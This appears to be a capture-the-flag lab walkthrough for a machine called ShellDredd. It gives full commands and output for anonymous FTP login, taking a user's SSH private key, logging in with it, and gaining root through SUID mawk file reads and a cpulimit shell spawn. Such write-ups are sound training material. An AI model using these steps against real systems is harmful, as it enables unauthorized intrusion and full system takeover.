Pwned Date - 2nd July 2022

Enumeration

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.49.125
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 59:2d:21:0c:2f:af:9d:5a:7b:3e:a4:27:aa:37:89:08 (RSA)
|   256 59:26:da:44:3b:97:d2:30:b1:9b:9b:02:74:8b:87:58 (ECDSA)
|_  256 8e:ad:10:4f:e3:3e:65:28:40:cb:5b:bf:1d:24:7f:17 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

There is an open port on 21, let’s anonymous login to it

┌──(kali㉿VirtualBox)-[~]
└─$ ftp 192.168.125.130 -p 21

We got .hannah and there is an id_rsa in it

ftp> ls -la
229 Entering Extended Passive Mode (|||28931|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        115          4096 Aug 06  2020 .
drwxr-xr-x    3 0        115          4096 Aug 06  2020 ..
drwxr-xr-x    2 0        0            4096 Aug 06  2020 .hannah
226 Directory send OK.

ftp> cd .hannah
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||13893|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Aug 06  2020 .
drwxr-xr-x    3 0        115          4096 Aug 06  2020 ..
-rwxr-xr-x    1 0        0            1823 Aug 06  2020 id_rsa
226 Directory send OK.

ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||49858|)
150 Opening BINARY mode data connection for id_rsa (1823 bytes).
100% |************************************|  1823      593.22 KiB/s    00:00 ETA
226 Transfer complete.
1823 bytes received in 00:00 (7.07 KiB/s)

The id_rsa of .hannah

Exploitation

The SSH port is on 61000, and we have id_rsa , and we know its hannah user

┌──(kali㉿VirtualBox)-[~]
└─$ chmod 400 id_rsa 
                                                                                                                                                                                  
┌──(kali㉿VirtualBox)-[~]
└─$ ssh [email protected] -p 61000 -i id_rsa
Linux ShellDredd 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

hannah@ShellDredd:~$ whoami
hannah

hannah@ShellDredd:~$ cat local.txt 
4658afe63cd08cab949c51167b88a637

Privilege Escalation

It does not have sudo in the system, so we go to check SUID

hannah@ShellDredd:~$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/cpulimit
/usr/bin/mount
/usr/bin/passwd

Cool, there is /usr/bin/mawk which is available on GTFObins

hannah@ShellDredd:~$ LFILE=/root/.ssh/id_rsa
hannah@ShellDredd:~$ /usr/bin/mawk '//' "$LFILE"
mawk: cannot open /root/.ssh/id_rsa (No such file or directory)

hannah@ShellDredd:~$ LFILE=/root/proof.txt
hannah@ShellDredd:~$ /usr/bin/mawk '//' "$LFILE"
292f2959c5847cfc242eef298778ce14

There is another available SUID binary which is /usr/bin/cpulimit

hannah@ShellDredd:~$ /usr/bin/cpulimit -l 100 -f -- /bin/sh -p
Process 1221 detected

# whoami
root

# cat /root/proof.txt
292f2959c5847cfc242eef298778ce14